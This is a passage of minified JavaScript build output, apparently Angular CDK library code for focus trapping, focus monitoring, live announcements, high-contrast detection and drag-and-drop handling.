a=t.nodeName.toLowerCase(),e="input"===a&&t.type;return"text"===e||"password"===e||"select"===a||"textarea"===a}(e))&&("audio"===n?!!e.hasAttribute("controls")&&-1!==r:"video"===n?-1!==r&&(null!==r||this._platform.FIREFOX||e.hasAttribute("controls")):e.tabIndex>=0)}isFocusable(e,i){return function epe(t){return!function Kfe(t){return function Yfe(t){return"input"==t.nodeName.toLowerCase()}(t)&&"hidden"==t.type}(t)&&(function $fe(t){let a=t.nodeName.toLowerCase();return"input"===a||"select"===a||"button"===a||"textarea"===a}(t)||function Xfe(t){return function Jfe(t){return"a"==t.nodeName.toLowerCase()}(t)&&t.hasAttribute("href")}(t)||t.hasAttribute("contenteditable")||Hz(t))}(e)&&!this.isDisabled(e)&&((null==i?void 0:i.ignoreVisibility)||this.isVisible(e))}}return t.\u0275fac=function(e){return new(e||t)(At(sr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Hz(t){if(!t.hasAttribute("tabindex")||void 0===t.tabIndex)return!1;let a=t.getAttribute("tabindex");return!(!a||isNaN(parseInt(a,10)))}function Uz(t){if(!Hz(t))return null;const a=parseInt(t.getAttribute("tabindex")||"",10);return isNaN(a)?-1:a}class ipe{constructor(a,e,i,n,r=!1){this._element=a,this._checker=e,this._ngZone=i,this._document=n,this._hasAttached=!1,this.startAnchorListener=()=>this.focusLastTabbableElement(),this.endAnchorListener=()=>this.focusFirstTabbableElement(),this._enabled=!0,r||this.attachAnchors()}get enabled(){return this._enabled}set enabled(a){this._enabled=a,this._startAnchor&&this._endAnchor&&(this._toggleAnchorTabIndex(a,this._startAnchor),this._toggleAnchorTabIndex(a,this._endAnchor))}destroy(){const a=this._startAnchor,e=this._endAnchor;a&&(a.removeEventListener("focus",this.startAnchorListener),a.remove()),e&&(e.removeEventListener("focus",this.endAnchorListener),e.remove()),this._startAnchor=this._endAnchor=null,this._hasAttached=!1}attachAnchors(){return!!this._hasAttached||(this._ngZone.runOutsideAngular(()=>{this._startAnchor||(this._startAnchor=this._createAnchor(),this._startAnchor.addEventListener("focus",this.startAnchorListener)),this._endAnchor||(this._endAnchor=this._createAnchor(),this._endAnchor.addEventListener("focus",this.endAnchorListener))}),this._element.parentNode&&(this._element.parentNode.insertBefore(this._startAnchor,this._element),this._element.parentNode.insertBefore(this._endAnchor,this._element.nextSibling),this._hasAttached=!0),this._hasAttached)}focusInitialElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusInitialElement(a)))})}focusFirstTabbableElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusFirstTabbableElement(a)))})}focusLastTabbableElementWhenReady(a){return new Promise(e=>{this._executeOnStable(()=>e(this.focusLastTabbableElement(a)))})}_getRegionBoundary(a){const e=this._element.querySelectorAll(`[cdk-focus-region-${a}], [cdkFocusRegion${a}], [cdk-focus-${a}]`);return"start"==a?e.length?e[0]:this._getFirstTabbableElement(this._element):e.length?e[e.length-1]:this._getLastTabbableElement(this._element)}focusInitialElement(a){const e=this._element.querySelector("[cdk-focus-initial], [cdkFocusInitial]");if(e){if(!this._checker.isFocusable(e)){const i=this._getFirstTabbableElement(e);return null==i||i.focus(a),!!i}return e.focus(a),!0}return this.focusFirstTabbableElement(a)}focusFirstTabbableElement(a){const e=this._getRegionBoundary("start");return e&&e.focus(a),!!e}focusLastTabbableElement(a){const e=this._getRegionBoundary("end");return e&&e.focus(a),!!e}hasAttached(){return this._hasAttached}_getFirstTabbableElement(a){if(this._checker.isFocusable(a)&&this._checker.isTabbable(a))return a;const e=a.children;for(let i=0;i<e.length;i++){const n=e[i].nodeType===this._document.ELEMENT_NODE?this._getFirstTabbableElement(e[i]):null;if(n)return n}return null}_getLastTabbableElement(a){if(this._checker.isFocusable(a)&&this._checker.isTabbable(a))return a;const e=a.children;for(let i=e.length-1;i>=0;i--){const n=e[i].nodeType===this._document.ELEMENT_NODE?this._getLastTabbableElement(e[i]):null;if(n)return n}return null}_createAnchor(){const a=this._document.createElement("div");return this._toggleAnchorTabIndex(this._enabled,a),a.classList.add("cdk-visually-hidden"),a.classList.add("cdk-focus-trap-anchor"),a.setAttribute("aria-hidden","true"),a}_toggleAnchorTabIndex(a,e){a?e.setAttribute("tabindex","0"):e.removeAttribute("tabindex")}toggleAnchors(a){this._startAnchor&&this._endAnchor&&(this._toggleAnchorTabIndex(a,this._startAnchor),this._toggleAnchorTabIndex(a,this._endAnchor))}_executeOnStable(a){this._ngZone.isStable?a():this._ngZone.onStable.pipe(Cn(1)).subscribe(a)}}let z3=(()=>{class t{constructor(e,i,n){this._checker=e,this._ngZone=i,this._document=n}create(e,i=!1){return new ipe(e,this._checker,this._ngZone,this._document,i)}}return t.\u0275fac=function(e){return new(e||t)(At(Ky),At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function W3(t){return 0===t.buttons||0===t.offsetX&&0===t.offsetY}function F3(t){const a=t.touches&&t.touches[0]||t.changedTouches&&t.changedTouches[0];return!(!a||-1!==a.identifier||null!=a.radiusX&&1!==a.radiusX||null!=a.radiusY&&1!==a.radiusY)}const ape=new ni("cdk-input-modality-detector-options"),npe={ignoreKeys:[18,17,224,91,16]},z1=ym({passive:!0,capture:!0});let ope=(()=>{class t{constructor(e,i,n,r){this._platform=e,this._mostRecentTarget=null,this._modality=new zs(null),this._lastTouchMs=0,this._onKeydown=c=>{var d,T;null!==(T=null===(d=this._options)||void 0===d?void 0:d.ignoreKeys)&&void 0!==T&&T.some(k=>k===c.keyCode)||(this._modality.next("keyboard"),this._mostRecentTarget=wd(c))},this._onMousedown=c=>{Date.now()-this._lastTouchMs<650||(this._modality.next(W3(c)?"keyboard":"mouse"),this._mostRecentTarget=wd(c))},this._onTouchstart=c=>{F3(c)?this._modality.next("keyboard"):(this._lastTouchMs=Date.now(),this._modality.next("touch"),this._mostRecentTarget=wd(c))},this._options=Object.assign(Object.assign({},npe),r),this.modalityDetected=this._modality.pipe(Sw(1)),this.modalityChanged=this.modalityDetected.pipe(Bh()),e.isBrowser&&i.runOutsideAngular(()=>{n.addEventListener("keydown",this._onKeydown,z1),n.addEventListener("mousedown",this._onMousedown,z1),n.addEventListener("touchstart",this._onTouchstart,z1)})}get mostRecentModality(){return this._modality.value}ngOnDestroy(){this._modality.complete(),this._platform.isBrowser&&(document.removeEventListener("keydown",this._onKeydown,z1),document.removeEventListener("mousedown",this._onMousedown,z1),document.removeEventListener("touchstart",this._onTouchstart,z1))}}return t.\u0275fac=function(e){return new(e||t)(At(sr),At(qi),At(ga),At(ape,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const rpe=new ni("liveAnnouncerElement",{providedIn:"root",factory:function spe(){return null}}),cpe=new ni("LIVE_ANNOUNCER_DEFAULT_OPTIONS");let Nw=(()=>{class t{constructor(e,i,n,r){this._ngZone=i,this._defaultOptions=r,this._document=n,this._liveElement=e||this._createLiveElement()}announce(e,...i){const n=this._defaultOptions;let r,c;return 1===i.length&&"number"==typeof i[0]?c=i[0]:[r,c]=i,this.clear(),clearTimeout(this._previousTimeout),r||(r=n&&n.politeness?n.politeness:"polite"),null==c&&n&&(c=n.duration),this._liveElement.setAttribute("aria-live",r),this._ngZone.runOutsideAngular(()=>(this._currentPromise||(this._currentPromise=new Promise(d=>this._currentResolve=d)),clearTimeout(this._previousTimeout),this._previousTimeout=setTimeout(()=>{this._liveElement.textContent=e,"number"==typeof c&&(this._previousTimeout=setTimeout(()=>this.clear(),c)),this._currentResolve(),this._currentPromise=this._currentResolve=void 0},100),this._currentPromise))}clear(){this._liveElement&&(this._liveElement.textContent="")}ngOnDestroy(){var e,i;clearTimeout(this._previousTimeout),null===(e=this._liveElement)||void 0===e||e.remove(),this._liveElement=null,null===(i=this._currentResolve)||void 0===i||i.call(this),this._currentPromise=this._currentResolve=void 0}_createLiveElement(){const e="cdk-live-announcer-element",i=this._document.getElementsByClassName(e),n=this._document.createElement("div");for(let r=0;r<i.length;r++)i[r].remove();return n.classList.add(e),n.classList.add("cdk-visually-hidden"),n.setAttribute("aria-atomic","true"),n.setAttribute("aria-live","polite"),this._document.body.appendChild(n),n}}return t.\u0275fac=function(e){return new(e||t)(At(rpe,8),At(qi),At(ga),At(cpe,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const lpe=new ni("cdk-focus-monitor-default-options"),V3=ym({passive:!0,capture:!0});let js=(()=>{class t{constructor(e,i,n,r,c){this._ngZone=e,this._platform=i,this._inputModalityDetector=n,this._origin=null,this._windowFocused=!1,this._originFromTouchInteraction=!1,this._elementInfo=new Map,this._monitoredElementCount=0,this._rootNodeFocusListenerCount=new Map,this._windowFocusListener=()=>{this._windowFocused=!0,this._windowFocusTimeoutId=window.setTimeout(()=>this._windowFocused=!1)},this._stopInputModalityDetector=new J,this._rootNodeFocusAndBlurListener=d=>{for(let k=wd(d);k;k=k.parentElement)"focus"===d.type?this._onFocus(d,k):this._onBlur(d,k)},this._document=r,this._detectionMode=(null==c?void 0:c.detectionMode)||0}monitor(e,i=!1){const n=Gr(e);if(!this._platform.isBrowser||1!==n.nodeType)return Bi(null);const r=_3(n)||this._getDocument(),c=this._elementInfo.get(n);if(c)return i&&(c.checkChildren=!0),c.subject;const d={checkChildren:i,subject:new J,rootNode:r};return this._elementInfo.set(n,d),this._registerGlobalListeners(d),d.subject}stopMonitoring(e){const i=Gr(e),n=this._elementInfo.get(i);n&&(n.subject.complete(),this._setClasses(i),this._elementInfo.delete(i),this._removeGlobalListeners(n))}focusVia(e,i,n){const r=Gr(e);r===this._getDocument().activeElement?this._getClosestElementsInfo(r).forEach(([d,T])=>this._originChanged(d,i,T)):(this._setOrigin(i),"function"==typeof r.focus&&r.focus(n))}ngOnDestroy(){this._elementInfo.forEach((e,i)=>this.stopMonitoring(i))}_getDocument(){return this._document||document}_getWindow(){return this._getDocument().defaultView||window}_getFocusOrigin(e){return this._origin?this._originFromTouchInteraction?this._shouldBeAttributedToTouch(e)?"touch":"program":this._origin:this._windowFocused&&this._lastFocusOrigin?this._lastFocusOrigin:e&&this._isLastInteractionFromInputLabel(e)?"mouse":"program"}_shouldBeAttributedToTouch(e){return 1===this._detectionMode||!(null==e||!e.contains(this._inputModalityDetector._mostRecentTarget))}_setClasses(e,i){e.classList.toggle("cdk-focused",!!i),e.classList.toggle("cdk-touch-focused","touch"===i),e.classList.toggle("cdk-keyboard-focused","keyboard"===i),e.classList.toggle("cdk-mouse-focused","mouse"===i),e.classList.toggle("cdk-program-focused","program"===i)}_setOrigin(e,i=!1){this._ngZone.runOutsideAngular(()=>{this._origin=e,this._originFromTouchInteraction="touch"===e&&i,0===this._detectionMode&&(clearTimeout(this._originTimeoutId),this._originTimeoutId=setTimeout(()=>this._origin=null,this._originFromTouchInteraction?650:1))})}_onFocus(e,i){const n=this._elementInfo.get(i),r=wd(e);!n||!n.checkChildren&&i!==r||this._originChanged(i,this._getFocusOrigin(r),n)}_onBlur(e,i){const n=this._elementInfo.get(i);!n||n.checkChildren&&e.relatedTarget instanceof Node&&i.contains(e.relatedTarget)||(this._setClasses(i),this._emitOrigin(n,null))}_emitOrigin(e,i){e.subject.observers.length&&this._ngZone.run(()=>e.subject.next(i))}_registerGlobalListeners(e){if(!this._platform.isBrowser)return;const i=e.rootNode,n=this._rootNodeFocusListenerCount.get(i)||0;n||this._ngZone.runOutsideAngular(()=>{i.addEventListener("focus",this._rootNodeFocusAndBlurListener,V3),i.addEventListener("blur",this._rootNodeFocusAndBlurListener,V3)}),this._rootNodeFocusListenerCount.set(i,n+1),1==++this._monitoredElementCount&&(this._ngZone.runOutsideAngular(()=>{this._getWindow().addEventListener("focus",this._windowFocusListener)}),this._inputModalityDetector.modalityDetected.pipe(ea(this._stopInputModalityDetector)).subscribe(r=>{this._setOrigin(r,!0)}))}_removeGlobalListeners(e){const i=e.rootNode;if(this._rootNodeFocusListenerCount.has(i)){const n=this._rootNodeFocusListenerCount.get(i);n>1?this._rootNodeFocusListenerCount.set(i,n-1):(i.removeEventListener("focus",this._rootNodeFocusAndBlurListener,V3),i.removeEventListener("blur",this._rootNodeFocusAndBlurListener,V3),this._rootNodeFocusListenerCount.delete(i))}--this._monitoredElementCount||(this._getWindow().removeEventListener("focus",this._windowFocusListener),this._stopInputModalityDetector.next(),clearTimeout(this._windowFocusTimeoutId),clearTimeout(this._originTimeoutId))}_originChanged(e,i,n){this._setClasses(e,i),this._emitOrigin(n,i),this._lastFocusOrigin=i}_getClosestElementsInfo(e){const i=[];return this._elementInfo.forEach((n,r)=>{(r===e||n.checkChildren&&r.contains(e))&&i.push([r,n])}),i}_isLastInteractionFromInputLabel(e){const{_mostRecentTarget:i,mostRecentModality:n}=this._inputModalityDetector;if("mouse"!==n||!i||i===e||"INPUT"!==e.nodeName&&"TEXTAREA"!==e.nodeName||e.disabled)return!1;const r=e.labels;if(r)for(let c=0;c<r.length;c++)if(r[c].contains(i))return!0;return!1}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(sr),At(ope),At(ga,8),At(lpe,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),dpe=(()=>{class t{constructor(e,i){this._elementRef=e,this._focusMonitor=i,this._focusOrigin=null,this.cdkFocusChange=new Tt}get focusOrigin(){return this._focusOrigin}ngAfterViewInit(){const e=this._elementRef.nativeElement;this._monitorSubscription=this._focusMonitor.monitor(e,1===e.nodeType&&e.hasAttribute("cdkMonitorSubtreeFocus")).subscribe(i=>{this._focusOrigin=i,this.cdkFocusChange.emit(i)})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._monitorSubscription&&this._monitorSubscription.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js))},t.\u0275dir=Ot({type:t,selectors:[["","cdkMonitorElementFocus",""],["","cdkMonitorSubtreeFocus",""]],outputs:{cdkFocusChange:"cdkFocusChange"},exportAs:["cdkMonitorFocus"]}),t})();const Gz="cdk-high-contrast-black-on-white",jz="cdk-high-contrast-white-on-black",Lw="cdk-high-contrast-active";let Qz=(()=>{class t{constructor(e,i){this._platform=e,this._document=i,this._breakpointSubscription=Po(O3).observe("(forced-colors: active)").subscribe(()=>{this._hasCheckedHighContrastMode&&(this._hasCheckedHighContrastMode=!1,this._applyBodyHighContrastModeCssClasses())})}getHighContrastMode(){if(!this._platform.isBrowser)return 0;const e=this._document.createElement("div");e.style.backgroundColor="rgb(1,2,3)",e.style.position="absolute",this._document.body.appendChild(e);const i=this._document.defaultView||window,n=i&&i.getComputedStyle?i.getComputedStyle(e):null,r=(n&&n.backgroundColor||"").replace(/ /g,"");switch(e.remove(),r){case"rgb(0,0,0)":case"rgb(45,50,54)":case"rgb(32,32,32)":return 2;case"rgb(255,255,255)":case"rgb(255,250,239)":return 1}return 0}ngOnDestroy(){this._breakpointSubscription.unsubscribe()}_applyBodyHighContrastModeCssClasses(){if(!this._hasCheckedHighContrastMode&&this._platform.isBrowser&&this._document.body){const e=this._document.body.classList;e.remove(Lw,Gz,jz),this._hasCheckedHighContrastMode=!0;const i=this.getHighContrastMode();1===i?e.add(Lw,Gz):2===i&&e.add(Lw,jz)}}}return t.\u0275fac=function(e){return new(e||t)(At(sr),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Xy=(()=>{class t{constructor(e){e._applyBodyHighContrastModeCssClasses()}}return t.\u0275fac=function(e){return new(e||t)(At(Qz))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[$y]}),t})();function $z(t=0,a=Vy){return t<0&&(t=0),M3(t,t,a)}function zw(t,a,e){for(let i in a)if(a.hasOwnProperty(i)){const n=a[i];n?t.setProperty(i,n,null!=e&&e.has(i)?"important":""):t.removeProperty(i)}return t}function W1(t,a){const e=a?"":"none";zw(t.style,{"touch-action":a?"":"none","-webkit-user-drag":a?"":"none","-webkit-tap-highlight-color":a?"":"transparent","user-select":e,"-ms-user-select":e,"-webkit-user-select":e,"-moz-user-select":e})}function Kz(t,a,e){zw(t.style,{position:a?"":"fixed",top:a?"":"0",opacity:a?"":"0",left:a?"":"-999em"},e)}function B3(t,a){return a&&"none"!=a?t+" "+a:t}function Xz(t){const a=t.toLowerCase().indexOf("ms")>-1?1:1e3;return parseFloat(t)*a}function Ww(t,a){return t.getPropertyValue(a).split(",").map(i=>i.trim())}function Fw(t){const a=t.getBoundingClientRect();return{top:a.top,right:a.right,bottom:a.bottom,left:a.left,width:a.width,height:a.height,x:a.x,y:a.y}}function Vw(t,a,e){const{top:i,bottom:n,left:r,right:c}=t;return e>=i&&e<=n&&a>=r&&a<=c}function Yy(t,a,e){t.top+=a,t.bottom=t.top+t.height,t.left+=e,t.right=t.left+t.width}function Yz(t,a,e,i){const{top:n,right:r,bottom:c,left:d,width:T,height:k}=t,q=T*a,Y=k*a;return i>n-Y&&i<c+Y&&e>d-q&&e<r+q}class Jz{constructor(a){this._document=a,this.positions=new Map}clear(){this.positions.clear()}cache(a){this.clear(),this.positions.set(this._document,{scrollPosition:this.getViewportScrollPosition()}),a.forEach(e=>{this.positions.set(e,{scrollPosition:{top:e.scrollTop,left:e.scrollLeft},clientRect:Fw(e)})})}handleScroll(a){const e=wd(a),i=this.positions.get(e);if(!i)return null;const n=i.scrollPosition;let r,c;if(e===this._document){const k=this.getViewportScrollPosition();r=k.top,c=k.left}else r=e.scrollTop,c=e.scrollLeft;const d=n.top-r,T=n.left-c;return this.positions.forEach((k,q)=>{k.clientRect&&e!==q&&e.contains(q)&&Yy(k.clientRect,d,T)}),n.top=r,n.left=c,{top:d,left:T}}getViewportScrollPosition(){return{top:window.scrollY,left:window.scrollX}}}function Zz(t){const a=t.cloneNode(!0),e=a.querySelectorAll("[id]"),i=t.nodeName.toLowerCase();a.removeAttribute("id");for(let n=0;n<e.length;n++)e[n].removeAttribute("id");return"canvas"===i?iW(t,a):("input"===i||"select"===i||"textarea"===i)&&tW(t,a),eW("canvas",t,a,iW),eW("input, textarea, select",t,a,tW),a}function eW(t,a,e,i){const n=a.querySelectorAll(t);if(n.length){const r=e.querySelectorAll(t);for(let c=0;c<n.length;c++)i(n[c],r[c])}}let upe=0;function tW(t,a){"file"!==a.type&&(a.value=t.value),"radio"===a.type&&a.name&&(a.name=`mat-clone-${a.name}-${upe++}`)}function iW(t,a){const e=a.getContext("2d");if(e)try{e.drawImage(t,0,0)}catch(i){}}const aW=ym({passive:!0}),H3=ym({passive:!1}),Bw=new Set(["position"]);class fpe{constructor(a,e,i,n,r,c){this._config=e,this._document=i,this._ngZone=n,this._viewportRuler=r,this._dragDropRegistry=c,this._passiveTransform={x:0,y:0},this._activeTransform={x:0,y:0},this._hasStartedDragging=!1,this._moveEvents=new J,this._pointerMoveSubscription=I.EMPTY,this._pointerUpSubscription=I.EMPTY,this._scrollSubscription=I.EMPTY,this._resizeSubscription=I.EMPTY,this._boundaryElement=null,this._nativeInteractionsEnabled=!0,this._handles=[],this._disabledHandles=new Set,this._direction="ltr",this.dragStartDelay=0,this._disabled=!1,this.beforeStarted=new J,this.started=new J,this.released=new J,this.ended=new J,this.entered=new J,this.exited=new J,this.dropped=new J,this.moved=this._moveEvents,this._pointerDown=d=>{if(this.beforeStarted.next(),this._handles.length){const T=this._getTargetHandle(d);T&&!this._disabledHandles.has(T)&&!this.disabled&&this._initializeDragSequence(T,d)}else this.disabled||this._initializeDragSequence(this._rootElement,d)},this._pointerMove=d=>{const T=this._getPointerPositionOnPage(d);if(!this._hasStartedDragging){if(Math.abs(T.x-this._pickupPositionOnPage.x)+Math.abs(T.y-this._pickupPositionOnPage.y)>=this._config.dragStartThreshold){const pe=Date.now()>=this._dragStartTime+this._getDragStartDelay(d),Re=this._dropContainer;if(!pe)return void this._endDragSequence(d);(!Re||!Re.isDragging()&&!Re.isReceiving())&&(d.preventDefault(),this._hasStartedDragging=!0,this._ngZone.run(()=>this._startDragSequence(d)))}return}d.preventDefault();const k=this._getConstrainedPointerPosition(T);if(this._hasMoved=!0,this._lastKnownPointerPosition=T,this._updatePointerDirectionDelta(k),this._dropContainer)this._updateActiveDropContainer(k,T);else{const q=this.constrainPosition?this._initialClientRect:this._pickupPositionOnPage,Y=this._activeTransform;Y.x=k.x-q.x+this._passiveTransform.x,Y.y=k.y-q.y+this._passiveTransform.y,this._applyRootElementTransform(Y.x,Y.y)}this._moveEvents.observers.length&&this._ngZone.run(()=>{this._moveEvents.next({source:this,pointerPosition:k,event:d,distance:this._getDragDistance(k),delta:this._pointerDirectionDelta})})},this._pointerUp=d=>{this._endDragSequence(d)},this._nativeDragStart=d=>{if(this._handles.length){const T=this._getTargetHandle(d);T&&!this._disabledHandles.has(T)&&!this.disabled&&d.preventDefault()}else this.disabled||d.preventDefault()},this.withRootElement(a).withParent(e.parentDragRef||null),this._parentPositions=new Jz(i),c.registerDragItem(this)}get disabled(){return this._disabled||!(!this._dropContainer||!this._dropContainer.disabled)}set disabled(a){const e=wi(a);e!==this._disabled&&(this._disabled=e,this._toggleNativeDragInteractions(),this._handles.forEach(i=>W1(i,e)))}getPlaceholderElement(){return this._placeholder}getRootElement(){return this._rootElement}getVisibleElement(){return this.isDragging()?this.getPlaceholderElement():this.getRootElement()}withHandles(a){this._handles=a.map(i=>Gr(i)),this._handles.forEach(i=>W1(i,this.disabled)),this._toggleNativeDragInteractions();const e=new Set;return this._disabledHandles.forEach(i=>{this._handles.indexOf(i)>-1&&e.add(i)}),this._disabledHandles=e,this}withPreviewTemplate(a){return this._previewTemplate=a,this}withPlaceholderTemplate(a){return this._placeholderTemplate=a,this}withRootElement(a){const e=Gr(a);return e!==this._rootElement&&(this._rootElement&&this._removeRootElementListeners(this._rootElement),this._ngZone.runOutsideAngular(()=>{e.addEventListener("mousedown",this._pointerDown,H3),e.addEventListener("touchstart",this._pointerDown,aW),e.addEventListener("dragstart",this._nativeDragStart,H3)}),this._initialTransform=void 0,this._rootElement=e),"undefined"!=typeof SVGElement&&this._rootElement instanceof SVGElement&&(this._ownerSVGElement=this._rootElement.ownerSVGElement),this}withBoundaryElement(a){return this._boundaryElement=a?Gr(a):null,this._resizeSubscription.unsubscribe(),a&&(this._resizeSubscription=this._viewportRuler.change(10).subscribe(()=>this._containInsideBoundaryOnResize())),this}withParent(a){return this._parentDragRef=a,this}dispose(){var a,e;this._removeRootElementListeners(this._rootElement),this.isDragging()&&(null===(a=this._rootElement)||void 0===a||a.remove()),null===(e=this._anchor)||void 0===e||e.remove(),this._destroyPreview(),this._destroyPlaceholder(),this._dragDropRegistry.removeDragItem(this),this._removeSubscriptions(),this.beforeStarted.complete(),this.started.complete(),this.released.complete(),this.ended.complete(),this.entered.complete(),this.exited.complete(),this.dropped.complete(),this._moveEvents.complete(),this._handles=[],this._disabledHandles.clear(),this._dropContainer=void 0,this._resizeSubscription.unsubscribe(),this._parentPositions.clear(),this._boundaryElement=this._rootElement=this._ownerSVGElement=this._placeholderTemplate=this._previewTemplate=this._anchor=this._parentDragRef=null}isDragging(){return this._hasStartedDragging&&this._dragDropRegistry.isDragging(this)}reset(){this._rootElement.style.transform=this._initialTransform||"",this._activeTransform={x:0,y:0},this._passiveTransform={x:0,y:0}}disableHandle(a){!this._disabledHandles.has(a)&&this._handles.indexOf(a)>-1&&(this._disabledHandles.add(a),W1(a,!0))}enableHandle(a){this._disabledHandles.has(a)&&(this._disabledHandles.delete(a),W1(a,this.disabled))}withDirection(a){return this._direction=a,this}_withDropContainer(a){this._dropContainer=a}getFreeDragPosition(){const a=this.isDragging()?this._activeTransform:this._passiveTransform;return{x:a.x,y:a.y}}setFreeDragPosition(a){return this._activeTransform={x:0,y:0},this._passiveTransform.x=a.x,this._passiveTransform.y=a.y,this._dropContainer||this._applyRootElementTransform(a.x,a.y),this}withPreviewContainer(a){return this._previewContainer=a,this}_sortFromLastPointerPosition(){const a=this._lastKnownPointerPosition;a&&this._dropContainer&&this._updateActiveDropContainer(this._getConstrainedPointerPosition(a),a)}_removeSubscriptions(){this._pointerMoveSubscription.unsubscribe(),this._pointerUpSubscription.unsubscribe(),this._scrollSubscription.unsubscribe()}_destroyPreview(){var a,e;null===(a=this._preview)||void 0===a||a.remove(),null===(e=this._previewRef)||void 0===e||e.destroy(),this._preview=this._previewRef=null}_destroyPlaceholder(){var a,e;null===(a=this._placeholder)||void 0===a||a.remove(),null===(e=this._placeholderRef)||void 0===e||e.destroy(),this._placeholder=this._placeholderRef=null}_endDragSequence(a){if(this._dragDropRegistry.isDragging(this)&&(this._removeSubscriptions(),this._dragDropRegistry.stopDragging(this),this._toggleNativeDragInteractions(),this._handles&&(this._rootElement.style.webkitTapHighlightColor=this._rootElementTapHighlight),this._hasStartedDragging))if(this.released.next({source:this,event:a}),this._dropContainer)this._dropContainer._stopScrolling(),this._animatePreviewToPlaceholder().then(()=>{this._cleanupDragArtifacts(a),this._cleanupCachedDimensions(),this._dragDropRegistry.stopDragging(this)});else{this._passiveTransform.x=this._activeTransform.x;const e=this._getPointerPositionOnPage(a);this._passiveTransform.y=this._activeTransform.y,this._ngZone.run(()=>{this.ended.next({source:this,distance:this._getDragDistance(e),dropPoint:e,event:a})}),this._cleanupCachedDimensions(),this._dragDropRegistry.stopDragging(this)}}_startDragSequence(a){Jy(a)&&(this._lastTouchEventTime=Date.now()),this._toggleNativeDragInteractions();const e=this._dropContainer;if(e){const i=this._rootElement,n=i.parentNode,r=this._placeholder=this._createPlaceholderElement(),c=this._anchor=this._anchor||this._document.createComment(""),d=this._getShadowRoot();n.insertBefore(c,i),this._initialTransform=i.style.transform||"",this._preview=this._createPreviewElement(),Kz(i,!1,Bw),this._document.body.appendChild(n.replaceChild(r,i)),this._getPreviewInsertionPoint(n,d).appendChild(this._preview),this.started.next({source:this,event:a}),e.start(),this._initialContainer=e,this._initialIndex=e.getItemIndex(this)}else this.started.next({source:this,event:a}),this._initialContainer=this._initialIndex=void 0;this._parentPositions.cache(e?e.getScrollableParents():[])}_initializeDragSequence(a,e){this._parentDragRef&&e.stopPropagation();const i=this.isDragging(),n=Jy(e),r=!n&&0!==e.button,c=this._rootElement,d=wd(e),T=!n&&this._lastTouchEventTime&&this._lastTouchEventTime+800>Date.now(),k=n?F3(e):W3(e);if(d&&d.draggable&&"mousedown"===e.type&&e.preventDefault(),i||r||T||k)return;if(this._handles.length){const te=c.style;this._rootElementTapHighlight=te.webkitTapHighlightColor||"",te.webkitTapHighlightColor="transparent"}this._hasStartedDragging=this._hasMoved=!1,this._removeSubscriptions(),this._initialClientRect=this._rootElement.getBoundingClientRect(),this._pointerMoveSubscription=this._dragDropRegistry.pointerMove.subscribe(this._pointerMove),this._pointerUpSubscription=this._dragDropRegistry.pointerUp.subscribe(this._pointerUp),this._scrollSubscription=this._dragDropRegistry.scrolled(this._getShadowRoot()).subscribe(te=>this._updateOnScroll(te)),this._boundaryElement&&(this._boundaryRect=Fw(this._boundaryElement));const q=this._previewTemplate;this._pickupPositionInElement=q&&q.template&&!q.matchSize?{x:0,y:0}:this._getPointerPositionInElement(this._initialClientRect,a,e);const Y=this._pickupPositionOnPage=this._lastKnownPointerPosition=this._getPointerPositionOnPage(e);this._pointerDirectionDelta={x:0,y:0},this._pointerPositionAtLastDirectionChange={x:Y.x,y:Y.y},this._dragStartTime=Date.now(),this._dragDropRegistry.startDragging(this,e)}_cleanupDragArtifacts(a){Kz(this._rootElement,!0,Bw),this._anchor.parentNode.replaceChild(this._rootElement,this._anchor),this._destroyPreview(),this._destroyPlaceholder(),this._initialClientRect=this._boundaryRect=this._previewRect=this._initialTransform=void 0,this._ngZone.run(()=>{const e=this._dropContainer,i=e.getItemIndex(this),n=this._getPointerPositionOnPage(a),r=this._getDragDistance(n),c=e._isOverContainer(n.x,n.y);this.ended.next({source:this,distance:r,dropPoint:n,event:a}),this.dropped.next({item:this,currentIndex:i,previousIndex:this._initialIndex,container:e,previousContainer:this._initialContainer,isPointerOverContainer:c,distance:r,dropPoint:n,event:a}),e.drop(this,i,this._initialIndex,this._initialContainer,c,r,n,a),this._dropContainer=this._initialContainer})}_updateActiveDropContainer({x:a,y:e},{x:i,y:n}){let r=this._initialContainer._getSiblingContainerFromPosition(this,a,e);!r&&this._dropContainer!==this._initialContainer&&this._initialContainer._isOverContainer(a,e)&&(r=this._initialContainer),r&&r!==this._dropContainer&&this._ngZone.run(()=>{this.exited.next({item:this,container:this._dropContainer}),this._dropContainer.exit(this),this._dropContainer=r,this._dropContainer.enter(this,a,e,r===this._initialContainer&&r.sortingDisabled?this._initialIndex:void 0),this.entered.next({item:this,container:r,currentIndex:r.getItemIndex(this)})}),this.isDragging()&&(this._dropContainer._startScrollingIfNecessary(i,n),this._dropContainer._sortItem(this,a,e,this._pointerDirectionDelta),this.constrainPosition?this._applyPreviewTransform(a,e):this._applyPreviewTransform(a-this._pickupPositionInElement.x,e-this._pickupPositionInElement.y))}_createPreviewElement(){const a=this._previewTemplate,e=this.previewClass,i=a?a.template:null;let n;if(i&&a){const r=a.matchSize?this._initialClientRect:null,c=a.viewContainer.createEmbeddedView(i,a.context);c.detectChanges(),n=oW(c,this._document),this._previewRef=c,a.matchSize?rW(n,r):n.style.transform=U3(this._pickupPositionOnPage.x,this._pickupPositionOnPage.y)}else n=Zz(this._rootElement),rW(n,this._initialClientRect),this._initialTransform&&(n.style.transform=this._initialTransform);return 